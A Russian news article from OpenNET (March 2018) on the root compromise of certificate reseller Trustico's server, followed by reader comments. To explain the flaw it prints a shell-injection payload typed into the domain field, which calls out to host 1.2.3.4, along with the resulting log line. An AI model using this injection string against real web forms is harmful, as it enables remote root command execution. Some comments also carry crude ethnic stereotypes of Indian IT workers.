The OpenNET Project / Index page

[ новости/++ | форум | wiki | теги ]

02.03.2018 09:05  Ожидается отзыв всех остальных сертификатов Trustico из-за полной компрометации сервера

Вчерашняя история с отзывом 23 тысяч сертификатов, выданных через реселлера Trustico, получала неожиданное продолжение. Один из исследователей безопасности раскрыл тривиальную уязвимость в web-интерфейсе, позволяющую получить root-доступ на сервер.

Проблема свидетельствует о наплевательском отношении к безопасности и косвенно подтверждает, что действия Trustico по отзыву сертификатов были связаны с инцидентом с безопасностью, несмотря на то, что компания отвергала подобные предположения. По информации от исследователя, продемонстрировавшего уязвимость, о проблеме было известно ранее и он почерпнул сведения из публичных источников. Суть выявленной уязвимости в передаче пользовательского ввода в обработчик на shell без экранирования спецсимволов. В частности, если ввести shell-операторы в поле ввода домена в форме проверки корректности установки сертификата, то они будут исполнены на сервере с правами root.

Например, при вводе вместо имени проверяемого домена строки "$(curl http://1.2.3.4/`id`)" на хост 1.2.3.4 придёт запрос вида: 


   1.2.3.4 - [02/Mar/2018:09:52:14] "GET /uid=0(root) HTTP/1.1" 404 209 "-" "curl/7.29.0"

В настоящее время сайт Trustico выведен из строя и недоступен. Пока непонятно позволял ли взломанный сервер получить доступ к архиву закрытых ключей клиентских сертификатов, но до выключения сервера одному из экспериментаторов удалось найти в конфигурации web-сервера закрытый ключ для SSL-сертификта домена "*.trustico.com", который хранился на скомпрометированном сервере.

Проблема также затронула партнёрский сайт SSLDirect.com, который размещался на том же сервере, и генерировал сертификаты через Trustico, характеризуя данную компанию как одного из ведущих мировых центров сертификации ("Trustico is one of the worlds leading SSL Certificate issuers").

Представители удостоверяющих центров DigiCert и Comodo, которые выступали в роли партнёров Trustico, пока никак не отреагировали на проблему, но в соответствии с правилами можно ожидать отзыва всех выданных через Trustico сертификатов в течение 24 часов. При этом представители Trustico заявили, что скомпрометированный сервер не имел доступа к информационным базам, в которых хранились данные клиентов.

  1. Главная ссылка к новости (https://www.reddit.com/r/sysad...)
  2. OpenNews: 23 тысячи SSL-сертификатов будут отозваны из-за инцидента в Trustico
  3. OpenNews: Поставлена под сомнение валидность 30 тысяч HTTPS-сертификатов удостоверяющего центра Symantec
  4. OpenNews: Symantec продаёт удостоверяющий центр компании DigiCert
  5. OpenNews: Вступили в силу требования к удостоверяющим центрам по проверке CAA-записей в DNS
  6. OpenNews: Let's Encrypt занял 36% рынка удостоверяющих центров
Лицензия: CC-BY
Тип: Проблемы безопасности
Ключевые слова: trustico, ca, cert
При перепечатке указание ссылки на opennet.ru обязательно
Обсуждение Линейный вид | Ajax | Показать все | RSS
 
  • 1.1, Аноним, 09:18, 02/03/2018 [ответить] [смотреть все]
    		• +14 +/
    Что вы делаете, прекратите! Я попкорн уже не успеваю из аргентины подвозить
     
     
  • 2.23, user, 12:27, 02/03/2018 [^] [ответить] [смотреть все] [показать ветку]    [к модератору]
    		• +/
    Из аргентинской муки нужно делать блины на лопате.
     
  • 1.2, Аноним, 09:19, 02/03/2018 [ответить] [смотреть все]
    		• +/
    "Гори-гори ясно, чтобы не погасло!"
     
     
  • 2.5, Аноним, 09:24, 02/03/2018 [^] [ответить] [смотреть все] [показать ветку]
    		• +/
    Earth, Wind Fire - Boogie Wonderland Scooter - Fire... весь текст скрыт [показать] [показать ветку]
     
  • 2.22, Аноним, 12:21, 02/03/2018 [^] [ответить] [смотреть все] [показать ветку]     [к модератору]  
    		• +/
    The roof The roof The roof is on fire We don t need no water Let the motherfuck... весь текст скрыт [показать] [показать ветку]
     
  • 1.3, Аноним, 09:22, 02/03/2018 [ответить] [смотреть все]  
    		• +/
    урок коррупционерам
     
     
  • 2.11, Аноним, 10:15, 02/03/2018 [^] [ответить] [смотреть все] [показать ветку]  
    		• +/
    я Вас умоляю, просто подкорректируют планы безотносительно к сути происшествия
     
     
  • 3.18, Аноним, 11:07, 02/03/2018 [^] [ответить] [смотреть все]    [к модератору]  
    		• +/
    разумеется, на пути жадности нет преград
     
  • 1.4, A.Stahl, 09:23, 02/03/2018 [ответить] [смотреть все]  
    		• +2 +/
    Ну облажались. Бывает. Trustico это маленький посредник. Возможно там в штате 1 человек, он же хозяин-администратор-программист. Совершенно обычная ситуация. Ничего нового.
     
  • 1.6, commiethebeastie, 09:25, 02/03/2018 [ответить] [смотреть все]  
    		• +/
    >http://1.2.3.4/'id'

    CVSS 11?

     
  • 1.8, Аноним, 09:26, 02/03/2018 [ответить] [смотреть все]  
    		• +/
    Это бич IT, в энтерпрайз нужны внимательные, трудолюбивые и скромные, но так как... весь текст скрыт [показать]
     
     
  • 2.13, angra, 10:34, 02/03/2018 [^] [ответить] [смотреть все] [показать ветку]  
    		• +2 +/
    >Это бич IT, в энтерпрайз нужны внимательные, трудолюбивые и скромные

    А деньги есть только на студентов и индусов, так как почти все средства уходят на бонусы манагеров.

     
  • 2.17, Аноним, 11:04, 02/03/2018 [^] [ответить] [смотреть все] [показать ветку]     [к модератору]  
    		• +/
    послушные, согласные, умеющие в минимум полезных действий, внимание и трудолюбие... весь текст скрыт [показать] [показать ветку]
     
     
  • 3.24, Аноним, 12:32, 02/03/2018 [^] [ответить] [смотреть все]     [к модератору]  
    		• –1 +/
    В стартапах, да В энтерпрайзе наоборот ... весь текст скрыт [показать]
     
  • 2.27, Аноним, 13:05, 02/03/2018 [^] [ответить] [смотреть все] [показать ветку]     [к модератору]  
    		• +/
    проблема в тех кто платит, не принёс новую звёздную идею - не достоин хорошего д... весь текст скрыт [показать] [показать ветку]
     
  • 1.9, Аноним, 09:28, 02/03/2018 [ответить] [смотреть все]  
    		• +1 +/
    Уволенный из Equifax администратор, перешёл на работу в Trustico?
     
     
  • 2.10, нах, 09:52, 02/03/2018 [^] [ответить] [смотреть все] [показать ветку]  
    		• –1 +/
    уволенный поехал обратно в свою деревню под Бангалором, в трех тапках - два на ногах, один в жопе, проблема в том, что их в той деревне пол-миллиона, и треть уехали в Штаты по очень мягким визовым правилам. (вторая треть уехала в Европы с ближними Азиями)
    тапок не хватит.
     
  • 1.15, Аноним, 10:37, 02/03/2018 [ответить] [смотреть все]  
    		• +/
    И не отреагируют, сколько мы ни будем ожидать ... весь текст скрыт [показать]
     
  • 1.16, Аноним, 10:47, 02/03/2018 [ответить] [смотреть все]  
    		• +/
    При этом представители Trustico заявили, что скомпрометированный сервер не имел ... весь текст скрыт [показать]
     
     
  • 2.19, Аноним, 11:12, 02/03/2018 [^] [ответить] [смотреть все] [показать ветку]     [к модератору]  
    		• +/
    Я думаю, что эта фраза в конце новости подается просто для особого смака ... весь текст скрыт [показать] [показать ветку]
     
  • 2.20, Аноним, 11:27, 02/03/2018 [^] [ответить] [смотреть все] [показать ветку]     [к модератору]  
    		• +/
    в выигрыше остались те, кто доверился малозащищенному реселлеру - все они узнали... весь текст скрыт [показать] [показать ветку]
     
  • 1.21, Zlo, 11:40, 02/03/2018 [ответить] [смотреть все]    [к модератору]  
    		• +1 +/
    Вот даже интересно после появление Let's Encrypt пошла какая то полоса неудач у всех остальных сертификаторов......прям совпадение.....
     
     
  • 2.25, Аноним, 12:47, 02/03/2018 [^] [ответить] [смотреть все] [показать ветку]    [к модератору]  
    		• +/
    Не думаю
     
  • 2.26, Аноним, 12:57, 02/03/2018 [^] [ответить] [смотреть все] [показать ветку]    [к модератору]  
    		• +/
    А сам letsencrypt можно рассматривать как монокультуру...
     
  • 1.28, Дуплик, 13:40, 02/03/2018 [ответить] [смотреть все]    [к модератору]  
    		• +/
    Когда уже сделают принципиально новый HTTPSSS на блокчейне? HTTPS абсолютно несекьюрный.
     

     Добавить комментарий
    Имя:
    E-Mail:
    Заголовок:
    Текст:
      Закладки на сайте
      Проследить за страницей     		Created 1996-2018 by Maxim Chirkov  
    ДобавитьРекламаВебмастеруГИД  
    Hosting by Ihor